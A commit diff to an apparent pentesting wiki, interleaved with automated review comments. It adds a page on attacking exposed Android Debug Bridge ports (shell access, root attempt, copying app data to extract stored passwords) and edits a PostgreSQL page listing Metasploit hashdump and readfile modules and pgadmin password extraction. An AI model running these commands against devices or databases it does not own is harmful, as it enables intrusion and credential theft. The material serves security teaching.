GitBook: [#2838] adb svc

CPol 2021-11-12 01:11:08 +00:00 committed by gitbook-bot
parent 1b6c914d27
commit 1524a08546
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 51 additions and 10 deletions

@ -332,6 +332,7 @@
* [5000 - Pentesting Docker Registry](pentesting/5000-pentesting-docker-registry.md)
* [5353/UDP Multicast DNS (mDNS)](pentesting/5353-udp-multicast-dns-mdns.md)
* [5432,5433 - Pentesting Postgresql](pentesting/pentesting-postgresql.md)
* [5555 - Android Debug Bridge](pentesting/5555-android-debug-bridge.md)
* [5601 - Pentesting Kibana](pentesting/5601-pentesting-kibana.md)
* [5671,5672 - Pentesting AMQP](pentesting/5671-5672-pentesting-amqp.md)
* [5800,5801,5900,5901 - Pentesting VNC](pentesting/pentesting-vnc.md)

@ -0,0 +1,41 @@
# 5555 - Android Debug Bridge
## Basic Information
**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. (from [here](https://developer.android.com/studio/command-line/adb))
**Default port**: 5555.
```
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
```
## Connect
If find the ADB service running in a port of a device and you can connect to it, **you can get a shell inside the system:**
```bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
```
For more ADB commands check the following page:
{% content-ref url="../mobile-apps-pentesting/android-app-pentesting/adb-commands.md" %}
[adb-commands.md](../mobile-apps-pentesting/android-app-pentesting/adb-commands.md)
{% endcontent-ref %}
### Dump App data
In order to completely download the data of an application you can:
```bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
```
You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274).
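Review bot: In the Dump App data block, the explanatory note is fused onto the `cp -r /data/data/com.package /sdcard` line inside the bash fence with no `#`, so anyone copying that line passes the sentence to `cp` as extra arguments; move the note out of the fence or put it on its own comment line. The same block mixes commands that run on the device (`chmod` and `cp`, under "From a root console") with `adb pull`, which runs on the host, so label which side each line belongs to, and mention that `chmod 777` leaves the app directory world-accessible afterwards. Wording fixes while here: `i**nstalling` has the bold marker one character late, "If find the ADB service" is missing "you", and "the information a references" should read "and references".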

@ -4,9 +4,9 @@
**PostgreSQL** is an _\*\*_open source object-relational database system that uses and extends the SQL language.
**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port \(5433 probably\) which is not in use.
**Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.
```text
```
PORT STATE SERVICE
5432/tcp open pgsql
```
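Review bot: The first line of this hunk still reads `_\*\*_open source`, stray emphasis markup of the same kind as the escaped parentheses this change cleans up on the Default port line; drop the `_\*\*_` so the sentence renders cleanly. The fence also loses its `text` tag here, which is harmless for nmap output but should be a deliberate choice applied the same way across the file.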
@ -74,23 +74,23 @@ ORDER BY 1;
## Enumeration
```text
```
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
```
### \*\*\*\*[**Brute force**](../brute-force.md#postgresql)
### [**Brute force**](../brute-force.md#postgresql)
Client authentication is controlled by a config file frequently named _**pg\_hba.conf**_. This file has a set of records. A record may have one of the following seven formats:
![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu_N1ztXJg)
![](https://lh4.googleusercontent.com/Ff8YbD3ppYmN2Omp-4M-0AAVhLsr4c2i7d7HUjgkE-O6NZ5zbaST1hdMPrp1AL\_xTXJalYe0HYxUk76vWJUfHZ5GuCDvIL1A-sMV44Z0CYSVgLM9ttFTDu-BhzewBGc7FeMarTLqsu\_N1ztXJg)
**Each** record **specifies** a **connection type**, a **client IP address range** \(if relevant for the connection type\), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.
**Each** record **specifies** a **connection type**, a **client IP address range** (if relevant for the connection type), a **database name**, a **user name**, and the **authentication method** to be used for connections matching these parameters. The **first record with a match**ing connection type, client address, requested database, and user name **is used** to perform authentication. There is no "fall-through" or "backup": **if one record is chosen and the authentication fails, subsequent records are not considered**. If no record matches, access is denied.\
The **password-based** authentication methods are **md5**, **crypt**, and **password**. These methods operate similarly except for the way that the password is sent across the connection: respectively, MD5-hashed, crypt-encrypted, and clear-text. A limitation is that the crypt method does not work with passwords that have been encrypted in pg\_authid.
## **POST**
```text
```
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
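Review bot: The pg_hba.conf paragraph says a record "may have one of the following seven formats", but the formats exist only as an externally hosted image with empty alt text (the `lh4.googleusercontent.com` link); since that line is being touched anyway, replace the image with the formats written out as text so they survive link rot and are searchable. The new trailing `\` after "access is denied." forces a hard break straight into the sentence about password-based methods, where a blank line would make them separate paragraphs. This explanation also sits under the Brute force heading although it describes how authentication records are matched, so it would read better under a heading of its own.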
@ -115,8 +115,8 @@ Then, **restart the service**.
### pgadmin
[pgadmin](https://www.pgadmin.org/) is an administration and development platform for PostgreSQL.
You can find **passwords** inside the _**pgadmin4.db**_ file
[pgadmin](https://www.pgadmin.org) is an administration and development platform for PostgreSQL.\
You can find **passwords** inside the _**pgadmin4.db**_ file\
You can decrypt them using the _**decrypt**_ function inside the script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
```bash
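Review bot: The decrypt link points at `blob/master/web/pgadmin/utils/crypto.py`, a moving branch, so the file or its `decrypt` function can change or move underneath this page; link to a fixed commit or tag instead. The line "You can find **passwords** inside the _**pgadmin4.db**_ file" now ends in a hard-break `\` with no full stop, so it runs into the next sentence when rendered.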
@ -125,4 +125,3 @@ sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db
```
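Review bot: The context line `string pgadmin4.db` looks like a typo for `strings pgadmin4.db`, the utility that prints the printable strings in a binary file; there is normally no `string` command, so the line fails as written. Worth fixing in this commit since the block is already being edited.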